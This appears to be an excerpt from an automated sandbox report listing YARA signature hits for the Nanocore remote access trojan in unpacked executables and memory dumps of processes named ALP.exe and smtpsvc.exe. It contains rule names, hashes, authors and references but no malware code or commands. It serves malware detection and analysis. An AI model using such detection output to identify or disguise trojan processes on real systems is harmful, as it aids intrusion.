        Source: 4.2.ALP.exe.6c4629.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.6c4629.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.850000.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.850000.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.840000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.840000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 12.2.smtpsvc.exe.3298cc8.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.smtpsvc.exe.3298cc8.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.2.ALP.exe.840000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.840000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.244df88.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.244df88.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 11.2.smtpsvc.exe.3338cc8.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 11.2.smtpsvc.exe.3338cc8.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 11.2.smtpsvc.exe.3338cc8.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.2.ALP.exe.347b34e.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.347b34e.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.347b34e.26.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.smtpsvc.exe.3298cc8.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.smtpsvc.exe.3298cc8.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 12.2.smtpsvc.exe.3298cc8.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.2.ALP.exe.2300000.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.2300000.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.3480184.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.3480184.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.2.ALP.exe.34f8cc8.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.ALP.exe.34f8cc8.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 10.2.ALP.exe.3318cc8.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 10.2.ALP.exe.3318cc8.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.523014987.00000000032D9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000002.691493356.00000000021B0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.691493356.00000000021B0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000011.00000002.528139712.0000000002231000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000002.691041233.00000000008A0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.691041233.00000000008A0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0000000E.00000002.522978296.00000000022D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000010.00000002.525259528.0000000003549000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000002.690682289.00000000006C0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.690682289.00000000006C0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000010.00000002.525186411.0000000002541000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000002.690880215.0000000000780000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.690880215.0000000000780000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000004.00000002.690912627.0000000000790000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.690912627.0000000000790000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000004.00000002.691516728.00000000021D0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.691516728.00000000021D0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000004.00000002.690948278.00000000007C0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.690948278.00000000007C0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000004.00000002.690383308.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.690383308.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000011.00000002.528229678.0000000003239000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000002.694158728.0000000003479000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000002.690432511.0000000000470000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.690432511.0000000000470000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0000000A.00000002.511286759.0000000003289000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000A.00000002.511286759.0000000003289000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.522489862.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000E.00000002.522489862.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000002.690979593.0000000000820000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.690979593.0000000000820000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000011.00000002.527221961.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000011.00000002.527221961.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000002.694476042.00000000036F7000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000002.691050468.00000000008B0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.691050468.00000000008B0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000010.00000002.524484369.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000010.00000002.524484369.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000002.516689891.0000000003209000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000002.516689891.0000000003209000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000002.691024483.0000000000850000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.691024483.0000000000850000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000004.00000002.691059827.00000000008C0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.691059827.00000000008C0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000004.00000002.691013967.0000000000840000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.691013967.0000000000840000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000004.00000002.691571948.0000000002300000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.691571948.0000000002300000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
